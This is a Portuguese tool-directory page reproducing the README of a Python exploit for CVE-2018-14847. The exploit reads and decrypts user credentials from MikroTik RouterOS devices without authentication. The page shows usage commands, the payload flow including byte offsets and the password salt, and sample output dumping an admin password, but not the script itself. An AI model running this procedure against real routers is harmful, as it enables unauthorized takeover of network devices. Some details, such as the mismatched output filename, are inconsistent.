Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS — VULNERÁVEL CVE-2018-14847 - CREDENCIAIS EXTRAÍDAS MIKROTIK EM PYTHON | Kitploit
Ferramentas/GitHubGitHub/mourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas
Segurança IoTAtaques de SenhaAnálise de VulnerabilidadesExploraçãoSegurança de RedeRed Teaming
GitHubmourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas

VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS

VULNERÁVEL CVE-2018-14847 - CREDENCIAIS EXTRAÍDAS MIKROTIK EM PYTHON

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
129há 3 mesesAinda não revisado

Ferramentas de Pentest — /rede

Repositório de scripts para auditoria e testes de penetração em redes. Use apenas em dispositivos com autorização formal.


CVE-2018-14847 — MikroTik Winbox Credential Extractor

Descrição

Exploita a vulnerabilidade de leitura de arquivo não autenticada no serviço Winbox do MikroTik RouterOS. O handler de arquivos (handler ID 2) não valida autenticação, permitindo que um atacante externo leia o arquivo user.dat que contém todos os usuários e senhas do dispositivo.

As senhas são armazenadas cifradas com XOR usando a chave MD5(usuario + "283i4jfkai3389"). O script realiza a descriptografia automaticamente.

Versões afetadas

BranchVulnerável atéVersão corrigida
Stable6.426.42.1
Long-term6.40.76.40.8
RC6.426.43

Requisitos

  • Python 3.x (sem dependências externas)
  • Porta 8291 (Winbox) acessível no alvo

Uso

root@kitploit:~
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291

Exemplos

root@kitploit:~
# Alvo padrão na porta 8291
python3 cve_2018_14847.py 192.168.1.1

# Porta customizada
python3 cve_2018_14847.py 192.168.1.1 --port 8291

Fluxo do exploit

root@kitploit:~
1. Conecta na porta 8291 (Winbox)
        ↓
2. Envia FIRST_PAYLOAD — abre sessão + solicita /flash/rw/store/user.dat
        ↓
3. Extrai Session ID do byte 38 da resposta
        ↓
4. Injeta Session ID no byte 19 do SECOND_PAYLOAD
        ↓
5. Envia SECOND_PAYLOAD — lê o arquivo user.dat
        ↓
6. Parseia entradas M2 → extrai usuário e senha cifrada
        ↓
7. Descriptografa senha: XOR com MD5(usuario + salt)
        ↓
8. Exibe credenciais e salva em arquivo

Output esperado

root@kitploit:~
═══════════════════════════════════════════════════════
  CVE-2018-14847  —  MikroTik Winbox Credential Dump
  Unauthenticated File Read + Password Decryption
  Afetado: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
  Alvo  : 192.168.1.1:8291
  Data  : 2026-05-20 18:06:58

[*] Conectando em 192.168.1.1:8291 ...
[+] Conectado ao serviço Winbox.
[*] Enviando payload 1 (requisição de arquivo) ...
[+] Resposta recebida (84 bytes). Session ID: 0x35
[*] Enviando payload 2 (leitura do user.dat) ...
[+] Dados recebidos (312 bytes).
[*] Analisando user.dat (257 bytes úteis) ...

═══════════════════════════════════════════════════════
  CREDENCIAIS EXTRAÍDAS
═══════════════════════════════════════════════════════
  Usuário : admin
  Senha   : senha123
  Combo   : admin:senha123
───────────────────────────────────────────────────────
[+] 1 credencial(is) encontrada(s).
[+] Resultado salvo em: mikrotik_1192.168.1.1_20260520_180658.txt

Arquivo de saída

O resultado é salvo automaticamente em:

root@kitploit:~
mikrotik_<IP>_<TIMESTAMP>.txt

Exemplo: mikrotik_192.168.1.1_20260520_180658.txt

Contém: IP do alvo, data, CVE, versão afetada e todos os pares usuário:senha.

Referências

  • CVE: CVE-2018-14847
  • Exploit-DB: EDB-ID #45170
  • Descoberta original: Omid Shojaei (@Dmitriy_area51)
  • Divulgação: Abril 2018

Estrutura da pasta

root@kitploit:~
/rede/
├── README.md                        # este arquivo
├── cve_2018_14847.py                # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md      # relatório de pentest CGNAT
├── pentest_roteador_192.168.2.1.md  # relatório de pentest roteador
└── mikrotik_<IP>_<TIMESTAMP>.txt    # resultados gerados pelo script

AVISO LEGAL: Estas ferramentas são para uso exclusivo em ambientes autorizados. A execução não autorizada contra sistemas de terceiros é crime previsto na Lei 12.737/2012 (Lei Carolina Dieckmann) e no Art. 154-A do Código Penal Brasileiro.

Baixar ferramenta